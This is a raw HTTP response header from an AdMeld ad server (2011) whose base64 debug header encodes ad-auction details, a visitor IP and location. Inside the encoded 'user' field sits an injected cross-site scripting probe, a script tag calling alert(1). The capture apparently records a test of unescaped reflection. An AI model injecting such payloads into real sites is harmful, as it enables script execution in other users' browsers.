HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR" Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTQsICBzaXRlOiAgICAgICAgICJueXBvc3QiLCAgYWQ6ICAgICAgICAgICAzMjEyLCAgbmV0d29yazogICAgICAiYWRicml0ZSIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtOSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiZTA1NTY3M2QtMGZiZC00NmI4LTg5MzYtNGE4OTAzZjQ3Yjg5IiwgIHVzZXI6ICAgICAgICAgIjZhY2NjY2E0LWQwZTQtNDY0ZS1hODI0LWY2N2NiMjhkNTU1NjRjM2Y0Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+ZTIxNjM4YWY2NzkiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgImJlbG93LWZvbGQiLCAgZGl2OiAgICAgICAgICAiZTA1NTY3M2QtMGZiZC00NmI4LTg5MzYtNGE4OTAzZjQ3Yjg5IiwgIHVybDogICAgICAgICAgImh0dHA6Ly93d3cubnlwb3N0LmNvbS8iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAxOSwgIGFjY291bnRfaWQ6ICAgNDQ4LCAgbmV0d29ya19uYW1lOiAiQWRCcml0ZSIsICBwdWJsaXNoZXJfbmFtZTogIm55cG9zdCIsICBlY3BtOiAgICAgICAgICIwLjk1IiwgIGZlY3BtOiAgICAgICAgIjAuOTUiLCAgZmlsbDogICAgICAgICAiNDYuMzYiLCAgcGxhY2VtZW50OiAgICAiYmVsb3ctZm9sZCIsICBydWxlOiAgICAgICAgICJiZWxvdy1mb2xkIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6IkVuZ2FnZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjIxNDYxNzcsICJidXkiOjU0OTgsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNDc0NywgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjI5OTQyMSwgImJ1eSI6NTAzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHJpZ2dpdCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE4OTIyNjEsICJidXkiOjEyNDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJBY3VpdHkgQWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTkwMDk3NCwgImJ1eSI6NTIxMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkVxYWRzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTcxMzcxMywgImJ1eSI6NDI1MSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkZvcmJlcyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjIxNjM0MTYsICJidXkiOjcxOTksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJTaXRlIFNjb3V0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzQ4MTM2NywgImJ1eSI6ODc2OCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnNDAifQ== Content-Length: 2319 Content-Type: text/html Date: Tue, 08 Feb 2011 02:09:00 GMT Connection: close